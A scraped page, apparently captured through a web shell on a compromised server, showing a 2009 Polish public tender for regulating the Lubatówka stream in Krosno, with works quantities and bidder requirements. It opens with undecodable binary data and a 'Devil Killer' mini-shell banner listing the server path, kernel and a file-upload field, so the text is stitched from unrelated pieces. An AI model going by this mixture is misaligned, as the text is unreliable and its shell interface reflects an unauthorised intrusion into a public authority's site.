JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090828/142619-N-2009.html

<p class="kh_header"><b>Rzeszów: Lubatówka etap I - regulacja potoku Lubatówka w km 0+000 - 1+578 Etap I o łącznej długości 1,578 km na terenie miasta Krosna, pow. Krosno, woj. podkarpackie</b><br>
<b>Numer ogłoszenia: 142619 - 2009; data zamieszczenia: 28.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podkarpacki Zarząd Melioracji i Urządzeń Wodnych , ul. Hetmańska 9, 35-959 Rzeszów, woj. podkarpackie, faks 017 8536421.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzmiuw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Wojewódzka samorządowa jedn. org. nieposiadająca osobowości prawnej (jednostka budżetowa).</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Lubatówka etap I - regulacja potoku Lubatówka w km 0+000 - 1+578 Etap I o łącznej długości 1,578 km na terenie miasta Krosna, pow. Krosno, woj. podkarpackie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotowa inwestycja stanowi kontynuację robót wykonanych na odcinku 0+000 - 1+578 potoku Lubatówka w roku ubiegłym. Zakres robót obejmuje dalszą budowę opasek brzegowych z koszy siatkowo kamiennych na łukach wklęsłych i umocnień brzegów płytami JOMB na łukach wypukłych oraz obudowę wylotów z kanalizacji deszczowej i sanitarnej w ramach regulacji koryta potoku Lubatówka. Przewidziane roboty mają na celu zabezpieczenie brzegów koryta potoku przed erozją niekorzystną dla zabudowy i ciągów komunikacyjnych.
Regulacja w km 0+000 - 1+578 stanowi etap 1 przewidywanych do wykonania robót budowlanych w korycie potoku Lubatówka na terenie miasta Krosna.
Załączony do siwz projekt architektoniczno-budowlany obejmuje całość robót, w tym również roboty wykonawcze w 2008 r.

Pozostały do wykonania zakres robót obejmuje: 

a) Roboty przygotowawcze
W ramach robót przygotowawczych należy wykonać mechaniczne wykarczowanie pni w ilości 26 szt. i rozbiórkę elementów żelbetowych powyżej lewego przyczółka mostu przy ulicy Piłsudskiego 20m3, wyciąć krzaki o powierzchni 0,01 ha,  a także wykonać drogi technologiczne o powierzchni 1065m2.           

Drogi technologiczne
Z uwagi na rzadszą i oddaloną od koryta zabudowę, drogi technologiczne należy wykonać w następujących odcinkach:
- poniżej ulicy Piłsudskiego - brzeg lewy 	- 225 m2 
- poniżej ulicy Paderewskiego - brzeg prawy 	-   90 m2 
- zjazdy od strony bulwaru - 5 szt 		- 750 m2
Drogi wykonywane będą z płyt drogowych 3,0x1,0x0,15 po jednej stronie potoku, na drugą stronę materiały budowlane będą podawane dźwigiem. Powyższe drogi technologiczne mają  połączenie z drogami utwardzonymi ogólnodostępnymi  
Drogi te należy wykonać z płyt drogowych na istniejącym terenie z niewielkim jego przystosowaniem do układania płyt, natomiast w przypadku zjazdów z bulwaru należy płyty ułożyć na przygotowanym nasypie z dowiezionej ziemi uprzednio zmagazynowanej w hałdach. Zrezygnowano z drogi dojazdowej od lewego brzegu powyżej ulicy Piłsudskiego ze względu na brak zgody właścicieli działek, a transport materiałów będzie wykonywany od ulicy Podwale.
Parametry techniczne drogi:
szerokość 3,00 m,
zjazdy z bulwaru znajdującego się po prawej stronie koryta są o wymiarach  
15mx10m. 
Po wykonaniu umocnień drogi technologiczne i place manewrowe należy rozebrać a teren przywrócić do poprzedniego stanu.

b) Roboty ziemne i zagospodarowanie odkładów

W ramach robót ziemnych należy zagospodarować teren po rozebraniu wszystkich dróg technologicznych, placów manewrowych i zjazdów wykonywanych w ramach całego zadania tj. na powierzchni 0,06 ha za pomocą sprzętu rolniczego z  wysiewem traw i nawozu. Należy także zagospodarować odkłady ziemne na powierzchni 1.76 ha metodą pełnej uprawy po rozplantowaniu gruntu z wykopów przy użyciu sprzętu rolniczego do uprawy i wysiewu nasion traw.
Należy wykonać następujące roboty ziemne: 
- wykop mechaniczny  160,4 m3
- wykop ręczny             735,0m3
- rozplantowanie urobku wzdłuż brzegów 895,4m3
- plantowanie skarp 1505m3
- humusowanie z obsiewem nasionami traw powierzchni płyt JOMB oraz plantowanych skarp 2610m2

Zagospodarowanie terenu obejmuje także wykoszenie skarp oraz odkładów na    
odcinkach wykonanych w 2008 roku na powierzchni 11800 m2.  

c) Umocnienia za pomocą koszy siatkowo-kamiennych

1) Umocnienia za pomocą 3 koszy siatkowo-kamiennych.
Na brzegu lewym w km: 0+375-0+410,0+606-0+614,1+299-1+330 a także na brzegu prawym w km : 0+288-0+364,0+430-0+440  - łączna długość opasek 160mb. 
Planuje się wykonanie umocnienia brzegów koszami siatkowo kamiennymi, dolna warstwa z kosza o przekroju 50x150 cm, a na nim dwa kosze 50x100 cm ułożone kaskadowo tworząc nachylenie 1:1. 
Z uwagi na możliwość  erozji dna wzdłuż opaski  należy pierwszą warstwę koszy ułożyć na  narzucie kamiennym o grubości warstwy 0,30m pasem 2,0m, natomiast wprowadzone w projekcie architektoniczno - budowlanym zmiany nie przewidują już obetonowania koszy.

2) Umocnienia za pomocą 4 koszy siatkowo-kamiennych.
Taki sposób umocnienia przewiduje się wykonać w km 0+380-0+430 na  brzegu prawym, tj powyżej mostu na ul. Piłsudskiego na długości 50 m.
Z uwagi na możliwość erozji dna wzdłuż opaski należy pierwszą warstwę koszy o szerokości 1,5m ułożyć na narzucie kamiennym średnio 0,6m3 /1 mb opaski.
Czwarta warstwa koszy jest układana na płask po skarpie nad opaską z trzech  koszy pasem 1,5m warstwą 0,5m.

3) Umocnienia pojedynczym koszem siatkowo-kamiennym o wymiarach 50x150 cm
Pojedynczym koszem siatkowo-kamiennym o wymiarach 50x150 cm przewiduje się umocnić następujące miejsca:
- lewy przyczółek mostu na ul. Piłsudskiego na długości 16 m,
- prawy przyczółek mostu na ul. Paderewskiego, na długości 10m,
- prawy filar mostu na ul. Czajkowskiego na długości 12m,
- istniejący mur oporowy w km 1+277-1+299 na długości 22 m.

Przewiduje się wykonanie w przegłębieniach koryta potoku umocnienie dna za pomocą narzutu kamiennego pod wymienionymi wyżej opaskami z koszy i w przegłębieniach przy lewym przyczółku  mostu na ulic Piłsudskiego i prawym przyczółku mostu na ulicy Czajkowskiego a także w dnie przy skarpie lewej w km 0+455-0+470 i 1+365-1+380 wzdłuż ubezpieczenia z płyt JOMB.

d) Umocnienia za pomocą płyt JOMB
Powyżej opasek potrójnych z koszy siatkowo-kamiennych  skarpa z nachyleniem 1:1,5 umocniona płytami JOMB na geowłókninie pasem 1,00 m.
Na łukach wypukłych skarpy w km 0+517-0+576, 1+250-1+294 na brzegu prawym i w km 0+410-0+470, 1+105-1+214, 1+330-1+380 na brzegu lewym ubezpieczyć płytami pasem 4,0m ułożonymi na geowłókninie.
Długość odcinków ubezpieczonych tylko płytami JOMB wynosi 319 m.
Na powierzchni skarp w tym także na  płytach JOMB należy wykonać obsiew wraz z humusowaniem warstwą humusu 5 cm.

e) Wykonanie obudowy wylotów z kanalizacji deszczowej
Przewiduje się wykonanie obudowy 6 sztuk wylotów z kanalizacji deszczowej przechodzącej pod istniejącym obwałowaniem  za pomocą wylotów żelbetowych typu PW-1/60 i PW-2/80 z klapą zwrotną typ PWZ-1/60 i PWZ-2/80.
Pięć istniejących wylotów kanalizacji deszczowej na lewym brzegu potoku przewiduje się obudować wylotami żelbetowymi typu PW-1/60 bez klap
Roboty ziemne należy tutaj wykonywać ręcznie z uwagi na niewielkie ich rozmiary i w zależności od odległości wylotu od dna potoku należy odprowadzalnik wykonać rowem otwartym z ubezpieczeniem dna i skarp płytami JOMB średnio 15 m2 płyt poniżej każdego wylotu. Na wykonanych w ubiegłym roku odcinkach są pozostawione luki w ubezpieczeniu do wykonania stosownego podłączenia od wylotu. Wylot w km 1+120 został wyłączony, ponieważ kolektor kanalizacji deszczowej jest planowany do przebudowywany na większą średnicę.  Szerokość koryta potoku wynosi 6,00 m w dostosowaniu do istniejących warunków. Również w dostosowaniu do istniejących warunków dostosowano łuki o promieniu 30-90 metrów. 

3. Zakres robót obejmuje:
1) Roboty przygotowawcze i technologiczne:
- mechaniczne karczowanie pni:				-	26 szt.
- ręczne ścinanie i karczowanie krzaków			-	0.010 ha
- droga technologiczna z płyt żelbetowych:		-	1065 m2
- rozbiórka elementów żelbetowych z wywozem		-	20 m3
2) Roboty ziemne i zagospodarowanie odkładów:
- zagospodarowanie terenu po rozebraniu dróg technologicznych: -0,06ha
- zagospodarowanie odkładów ziemnych na powierzchni	-	 1,76 ha
- wykop mechaniczny 						-         160,4 m3
- wykop ręczny 						-	  735 m3
- wykoszenie skarp i powierzchni odkładów 			-         11800 m2
3) Roboty umocnieniowe:
- umocnienie brzegów wypukłych płytami JOMB o wymiarach 100x75x12,5 na geowłókninie pasem 4,0m	-	 319 m
- umocnienie brzegów wklęsłych koszami siatkowo-kamiennymi 3-warstwowymi: 			-	280 m3
- umocnienie brzegu prawego opaską z 4-ch warstw koszy -	125 m3
- wykonanie narzutu kamiennego w korycie potoku: 		-	69,7m3
- kosze pod mostami i przy murze oporowym		-	  45 m3
- umocnienie skarp płytami JOMB nad opaskami z koszy	-	160 m2
4) Wyloty kanalizacji deszczowej i sanitarnej
Wykonanie obudowy wylotów z kanalizacji deszczowej i sanitarnej - 11szt. 
oraz montaż klap zwrotnych				   	- 	  6,0 szt 
- ręczne rozkucie istniejących wylotów z wywózką gruzu:   	-	6,6 m3
- wykop ręczny pod wyloty					-	6,6 m3
- wykonanie podłoża betonowego z betonu B-20: 		-	7,15 m3
- wykonanie wylotów typ PW-1/60 i PW-2/80 z betonu zbrojonego B-20:-  16,94m3
- ułożenie płyt JOMB  100x75x12,5 na geowłókninie wokół wylotów 	- 165 m2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.24.00.00-1, 45.24.60.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 9 000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy, którzy: 
1) Nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych 
2) Spełniają warunki zawarte w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych.
3) Spełniają warunki i wymogi określone w specyfikacji istotnych warunków zamówienia i w ustawie Prawo Zamówień Publicznych, 
a w szczególności:
Wykonawca przystępujący do przetargu winien:
a) Zrealizować w okresie ostatnich 5 lat co najmniej 2 zamówienia odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia o minimalnej wartości każdego z nich 1,0 mln zł brutto (w generalnym wykonawstwie),
b) Wskazać do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby:
- Kierownika budowy 	- 1 osobę,
- Kierownika robót 	- 2 osoby.
W/w osoby winny legitymować się uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności: inżynieria wodna lub wodno-melioracyjna lub konstrukcyjno-inżynieryjna w zakresie budowli hydrotechnicznych lub winny posiadać inne odpowiadające w/w tożsame uprawnienia wydane na podstawie przepisów obowiązujących w czasie wydania uprawnień. 
Ponadto ww. osoby winny wykazać się przynależnością do właściwej izby samorządu zawodowego.
oraz:
- 1 osobę posiadającą uprawnienia zawodowe do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii w następujących zakresach:
geodezyjne pomiary sytuacyjno - wysokościowe, realizacyjne i inwentaryzacyjne,
rozgraniczanie i podział nieruchomości gruntowych oraz sporządzanie dokumentacji zgodnie z wymogami prawnymi
c) W przypadku złożenia oferty wspólnej przez dwóch lub więcej Wykonawców powyższe warunki powinny być spełnione przez tego lub tych Wykonawców, którzy w imieniu wszystkich wykażą spełnienie w/w warunków.
4) Złożą ofertę wraz z wymaganymi dokumentami, załącznikami oraz oświadczeniami.
Opis sposobu dokonywania oceny spełnienia warunków w postępowaniu: 
Ocena spełnienia warunków zostanie dokonana na podstawie załączonych do oferty oświadczeń i dokumentów określonych przez Zamawiającego w specyfikacji istotnych warunków zamówienia, według formuły spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) Oferta winna być sporządzona na lub w oparciu o Wzór formularza oferty (załącznik Nr 1 do specyfikacji) oraz zawierać niżej wymienione załączniki:

Załącznik Nr 1 - Tabela elementów scalonych w/g podanego wzoru.
Wykonawca winien podać dla każdego elementu tabeli cenę wyliczoną w oparciu o:
- projekt architektoniczno-budowlany,
- przedmiary robót,
- specyfikację techniczną wykonania i odbioru robót,
- warunki podane w specyfikacji istotnych warunków zamówienia,
- dokonaną wizję lokalną.

Załącznik Nr 2 - Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy z 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz.U. z 2007 r. Nr 223 poz. 1655 z późn. zm.) oraz o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy.

Załącznik Nr 3 - a/ Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej jeżeli odrębne przepisy wymagają  wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 m-cy przed upływem  terminu składania ofert.
b/ Jeżeli zasady reprezentacji nie wynikają jednoznacznie z przedłożonych zgodnie z ppkt. a dokumentów wymaga się złożenia dokumentu wskazującego osobę uprawnioną lub upoważnioną do reprezentowania Wykonawcy.

Załącznik Nr 4 - Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Załącznik Nr 5 - Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 Ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 m-cy przed upływem terminu składania ofert. 

Załącznik Nr 6 - Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Prawo zamówień publicznych wystawiona nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.

Załącznik Nr 7 - Wykaz wykonanych robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia z okresu ostatnich 5 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wg podanego wzoru: Doświadczenie w zakresie wykonawstwa. 
UWAGA: Za roboty odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia uważane będą roboty polegające  na regulacji, modernizacji koryt rzek i potoków oraz budowie, przebudowie, modernizacji obwałowań i śluz wałowych.

Załącznik Nr 8 - Dokumenty potwierdzające, że roboty, o których mowa w załączniku nr 7 zostały wykonane należycie np. referencje od Zamawiających.

Załącznik Nr 9 - Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz 
z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności wg podanego wzoru: Kwalifikacje techniczne.
Jeżeli w wykazie j.w. Wykonawca wskazał osoby, którymi będzie dysponował wówczas winien załączyć do oferty pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia - stosownie do § 1 ust. 2 pkt. 5a rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. nr 87, poz. 605 z późn. zm.).

Załącznik Nr 10 - a) Kserokopie uprawnień osób wskazanych w zał. nr 9
b) Kserokopia zaświadczenia o wpisie osób wskazanych w zał. Nr 9 na listę członków właściwej izby samorządu zawodowego (ustawa z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. nr 5, poz. 42 z późn. zm.).

Uwaga do załącznika Nr 9 i Nr 10: 
Wykonawca wskaże w zał. Nr 9 do uczestnictwa w wykonaniu niniejszego zamówienia następujące osoby:
a) Kierownika budowy 	- 1 osobę,
b) Kierownika robót 		- 2 osoby.
W/w osoby winny legitymować się uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności: inżynieria wodna lub wodno-melioracyjna lub konstrukcyjno-inżynieryjna w zakresie budowli hydrotechnicznych lub winny posiadać inne odpowiadające w/w tożsame uprawnienia wydane na podstawie przepisów obowiązujących w czasie wydania uprawnień. 
Ponadto ww. osoby winny wykazać się przynależnością do właściwej izby samorządu zawodowego.
oraz:
c) 1 osobę posiadającą uprawnienia zawodowe do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii w następujących zakresach:
- geodezyjne pomiary sytuacyjno - wysokościowe, realizacyjne i inwentaryzacyjne,
- rozgraniczanie i podział nieruchomości gruntowych oraz sporządzanie dokumentacji zgodnie z wymogami prawnymi.

Załącznik Nr 11 - Dowód wniesienia wadium.

Załącznik Nr 12 - Pełnomocnictwo stosownie do postanowień zawartych w art. 23 ust. 2 ustawy Prawo zamówień publicznych.

Załącznik Nr 13 - Wykaz dokumentów zastrzeżonych, jako tajne. Objęte wykazem dokumenty, stanowiące tajemnicę przedsiębiorstwa Wykonawca zamieści w oddzielnej kopercie.
Brak załącznika oznaczać będzie, że wszystkie złożone przez Wykonawcę dokumenty są jawne i mogą być udostępniane innym uczestnikom postępowania.

2. Stosownie do art. 8 ust. 3 ustawy Prawo zamówień publicznych Wykonawca może zastrzec nie później niż w terminie składania ofert, które ze złożonych informacji stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji i nie mogą być udostępniane. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy j.w.

3.1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w pkt. 1. załącznik Nr 3, Nr 4, Nr 5 i Nr 6 składa:
1) Załącznik Nr 3, Nr 4, Nr 6 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a) Nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) Nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) Nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
2) Załącznik Nr 5 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
3.2.	Dokumenty, o których mowa w pkt. 3.1 ppkt. 1a, c oraz ppkt. 2 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Dokument, o którym mowa w pkt. 3.1 ppkt 1b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3.3.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 3.1. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. W takim przypadku terminy, o których mowa w pkt 3.2. stosuje się odpowiednio.

4. Wymagania ogólne dotyczące sporządzenia oferty:
1) Wykonawcy powinni przedstawić oferty zgodne z wymaganiami specyfikacji istotnych warunków zamówienia. Oferta winna zawierać wszystkie wymagane dokumenty, oświadczenia, załączniki i należy ją sporządzić na lub w oparciu o Formularz oferty. Wykonawców obowiązuje wykorzystanie załączonych wzorów załączników. Wszystkie pola i pozycje tych wzorów winny być wypełnione. 
2) Dokumenty, o których mowa w pkt 1 mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez uprawnionych przedstawicieli Wykonawcy.
3) Ofertę składa się w formie pisemnej.
4) Zamawiający nie wyraża zgody na złożenie ofert w postaci elektronicznej.
5) Oferta powinna być napisana w języku polskim, trwałą i czytelną techniką (np. na maszynie do pisania, komputerze, długopisem) w 1 egzemplarzu. Wszystkie dokumenty w języku obcym należy załączyć wraz z ich tłumaczeniem na język polski, sporządzonym przez osobę uprawnioną (biegłego tłumacza), potwierdzonym przez Wykonawcę. 
6) Oferta, załączniki, oświadczenia muszą być podpisane przez osobę (osoby) uprawnione do reprezentowania Wykonawcy.
Jeżeli zasady reprezentacji nie wynikają z przedłożonych dokumentów wymaga się złożenie dokumentu wskazującego osobę uprawnioną lub upoważnioną do reprezentowania Wykonawcy.
7) Wszystkie miejsca, w których Wykonawca naniósł zmiany powinny być parafowane przez osobę podpisującą ofertę. Ewentualne zmiany powinny być naniesione czytelnie.
8) Wykonawcy ponoszą wszystkie koszty związane ze sporządzeniem i złożeniem oferty niezależnie od wyniku postępowania przetargowego.
9) Wykonawca może złożyć jedną ofertę.
10) Wykonawca winien zgromadzić wszelkie informacje, które mogą być konieczne do przygotowania oferty na własny koszt.
Wszystkie koszty związane z przeprowadzeniem wizji lokalnej ponosi samodzielnie każdy Wykonawca. 

5. Postanowienia w przypadku wniesienia oferty wspólnej przez dwóch lub więcej Wykonawców, o których mowa w art. 23 ustawy Prawo zamówień publicznych.
1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2) Pełnomocnictwo do pełnienia takiej funkcji, wystawione zgodnie z wymogami prawa, podpisane przez prawnie upoważnionych przedstawicieli każdego z Wykonawców winno być dołączone do oferty.
3) Zgodnie z art. 141 ustawy Prawo zamówień publicznych Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.
